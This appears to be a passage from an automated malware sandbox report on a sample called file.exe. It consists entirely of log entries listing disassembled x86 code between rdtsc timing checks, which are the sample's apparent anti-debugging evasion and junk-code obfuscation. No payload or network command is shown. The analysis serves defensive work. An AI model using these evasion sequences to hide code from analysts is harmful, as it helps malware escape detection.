          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F6064 second address: 2F6070 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65B529F4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F6070 second address: 2F60A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F65B4EE8BD6h 0x00000011 jmp 00007F65B4EE8BCEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F60A5 second address: 2F60AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F60AB second address: 2F60B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304381 second address: 3043AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65B529F4B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F65B529F4B6h 0x00000010 jmp 00007F65B529F4C8h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30467F second address: 304692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304A67 second address: 304A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F65B529F4B6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F65B529F4B6h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304A7B second address: 304A94 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65B4EE8BC6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F65B4EE8BD0h 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3077EF second address: 3077F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3077F5 second address: 3077FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307857 second address: 30785B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30792B second address: 307937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F65B4EE8BCCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307A48 second address: 307B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 30D2ACB6h 0x00000010 push 00000003h 0x00000012 mov cx, C0F5h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F65B529F4B8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 jmp 00007F65B529F4C7h 0x00000037 push 00000003h 0x00000039 mov ecx, dword ptr [ebp+122D3BA8h] 0x0000003f mov ecx, 59688A95h 0x00000044 call 00007F65B529F4B9h 0x00000049 jmp 00007F65B529F4C6h 0x0000004e push eax 0x0000004f push edx 0x00000050 jnc 00007F65B529F4B8h 0x00000056 pop edx 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b jg 00007F65B529F4C8h 0x00000061 mov eax, dword ptr [eax] 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jmp 00007F65B529F4BBh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307B0B second address: 307B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307B10 second address: 307B15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307B15 second address: 307B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB174 second address: 2FB17E instructions: 0x00000000 rdtsc 0x00000002 je 00007F65B529F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB17E second address: 2FB184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32577E second address: 32578A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65B529F4B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32578A second address: 325795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 325795 second address: 32579F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32579F second address: 3257A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 325AA1 second address: 325AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F65B529F4CEh 0x0000000b jmp 00007F65B529F4C8h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 325C0C second address: 325C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F65B4EE8BC6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 325C1E second address: 325C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 325C22 second address: 325C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB131 second address: 2FB151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F65B529F4C9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB151 second address: 2FB157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB157 second address: 2FB174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F65B529F4C6h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326368 second address: 32636E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32636E second address: 326372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326372 second address: 326392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCDh 0x00000007 jmp 00007F65B4EE8BCFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3264EE second address: 3264F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32665E second address: 32666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BCCh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326799 second address: 32679D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32679D second address: 3267B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65B4EE8BD2h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EECD second address: 31EED7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65B529F4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31EED7 second address: 31EEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326FF4 second address: 326FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326FF9 second address: 326FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326FFF second address: 32700F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F65B529F4B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 327400 second address: 327411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007F65B4EE8BC6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 327411 second address: 327431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32D8D4 second address: 32D8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32D8DC second address: 32D8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32D8E4 second address: 32D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnp 00007F65B4EE8BC6h 0x0000000c popad 0x0000000d je 00007F65B4EE8BCCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32D8F9 second address: 32D916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F65B529F4C3h 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 332807 second address: 33280B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F978D second address: 2F97A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F97A4 second address: 2F97B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65B4EE8BC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331EA0 second address: 331EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331EA6 second address: 331EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331FEF second address: 331FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331FF5 second address: 332017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F65B4EE8BCAh 0x0000000b jmp 00007F65B4EE8BD1h 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 332017 second address: 332027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F65B529F4B6h 0x0000000a js 00007F65B529F4B6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 332027 second address: 332051 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F65B4EE8BCEh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 332182 second address: 33219B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jc 00007F65B529F4BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 332695 second address: 33269C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33269C second address: 3326A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F65B529F4BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336123 second address: 336136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336136 second address: 336140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F65B529F4B6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3368D6 second address: 3368E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F65B4EE8BC6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336973 second address: 33697D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336C4C second address: 336C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336C50 second address: 336C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F65B529F4B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jc 00007F65B529F4BCh 0x0000002a mov dword ptr [ebp+122D232Ch], esi 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336C8E second address: 336C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336C92 second address: 336C98 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336C98 second address: 336CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B4EE8BD7h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336CB3 second address: 336CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 336CB7 second address: 336CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 337172 second address: 33717C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33717C second address: 337186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F65B4EE8BC6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33A036 second address: 33A040 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33ACCF second address: 33ACD4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33B8B6 second address: 33B8D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65B529F4BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65B529F4BBh 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33C37F second address: 33C429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F65B4EE8BD5h 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D1EB0h], edx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F65B4EE8BC8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D3036h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F65B4EE8BC8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 call 00007F65B4EE8BD9h 0x00000059 mov si, dx 0x0000005c pop edi 0x0000005d xchg eax, ebx 0x0000005e je 00007F65B4EE8BD4h 0x00000064 push eax 0x00000065 push edx 0x00000066 jne 00007F65B4EE8BC6h 0x0000006c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33CCA5 second address: 33CCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33CCA9 second address: 33CCB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33CCB3 second address: 33CCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33CCB7 second address: 33CCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33FF1B second address: 33FF25 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33F118 second address: 33F11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33F11E second address: 33F122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34010B second address: 340115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F65B4EE8BC6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 341F72 second address: 341F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 341F77 second address: 341F7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 341F7E second address: 341FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007F65B529F4BEh 0x0000000e jbe 00007F65B529F4B8h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 nop 0x00000017 movsx edi, bx 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d sub dword ptr [ebp+122D236Ah], ebx 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 mov ebx, 18631EF1h 0x0000002b mov edi, eax 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jg 00007F65B529F4CCh 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343FBB second address: 343FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3421D6 second address: 3421DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2C0B second address: 2F2C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 345570 second address: 345575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3447FE second address: 34480C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B4EE8BCAh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3465EC second address: 346647 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F65B529F4B8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 sbb edi, 74EE4D47h 0x0000002c push 00000000h 0x0000002e adc bh, FFFFFFF6h 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D33B7h], edx 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F65B529F4C7h 0x00000042 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 345721 second address: 345725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
